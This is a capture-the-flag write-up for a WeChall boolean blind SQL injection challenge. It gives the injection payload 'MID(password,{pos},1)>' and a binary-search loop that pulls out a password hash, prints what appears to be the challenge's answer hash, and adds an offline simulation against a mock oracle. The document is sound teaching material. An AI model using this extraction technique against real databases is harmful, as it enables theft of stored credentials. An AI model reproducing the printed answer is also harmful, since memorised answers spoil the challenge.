WeChall - Blinded by the light

Challenge

Boolean blind SQL injection. Extract a 32-character hex hash from the database using boolean-based blind techniques.

Solution

A source-code audit confirms a boolean-based blind SQL injection. The hash is 32 hexadecimal characters (0-9, A-F), so each position has 16 possible values. Each position takes 4 binary-search queries (16→8→4→2→1), so all 32 positions need 128 queries in total.

Core injection payload:

MID(password,{pos},1)>'{char}'

The page's True/False response tells which half of the candidate range the character falls in, and a binary search pins down each character.

HEX = "0123456789ABCDEF"   # candidate alphabet, sorted so '>' comparisons are meaningful
result = ""

for pos in range(1, 33):
    lo, hi = 0, 15           # inclusive index range into HEX still possible
    while lo < hi:
        mid = (lo + hi) // 2
        # inject: MID(password,{pos},1) > HEX[mid]
        # oracle(pos, ch) is the page's True/False answer to that payload
        if oracle(pos, HEX[mid]):
            lo = mid + 1     # character is above HEX[mid]
        else:
            hi = mid         # character is HEX[mid] or below
    result += HEX[lo]        # lo == hi: exactly one candidate left
9DF0D5E04DC51E5A17A667DBD1C9EBEA
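As an added example (not part of the original writeup), the search above run offline against a constructed secret, with a mock oracle standing in for the page's True/False answer, to confirm the 4-queries-per-character and 128-in-total count stated in the solution. `MockOracle`, `extract`, `simulate` and the `SECRET` value are assumptions made up for this example.

```python
# Added example, not the writeup's own code: a local simulation of the
# boolean blind binary search. The oracle is a Python function, not an
# HTTP request; it stands in for the page's answer to MID(password,pos,1) > 'c'.

HEX = "0123456789ABCDEF"
# Constructed sample hash for the simulation, not the challenge's value.
SECRET = "0123456789ABCDEFFEDCBA9876543210"


class MockOracle:
    """Answers the boolean question the payload asks and counts the queries."""

    def __init__(self, secret):
        self.secret = secret
        self.queries = 0

    def __call__(self, pos, ch):
        self.queries += 1
        # MySQL's default collations compare strings case-insensitively, so a
        # lowercase stored hash answers the same as an uppercase one; the mock
        # mirrors that by uppercasing both sides before comparing.
        return self.secret[pos - 1].upper() > ch.upper()


def extract(oracle, length=32):
    """Recover `length` hex characters, 4 boolean queries per position."""
    result = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 15                  # inclusive candidate index range into HEX
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, HEX[mid]):   # secret char > HEX[mid]
                lo = mid + 1            # answer is in the upper half
            else:
                hi = mid                # answer is HEX[mid] or below
        result += HEX[lo]               # range collapsed to one candidate
    return result


def simulate(secret=SECRET):
    """Run the extraction against the mock; return (recovered, query count)."""
    oracle = MockOracle(secret)
    recovered = extract(oracle)
    return recovered, oracle.queries


if __name__ == "__main__":
    recovered, n = simulate()
    print(recovered, n)   # prints the constructed secret and 128
```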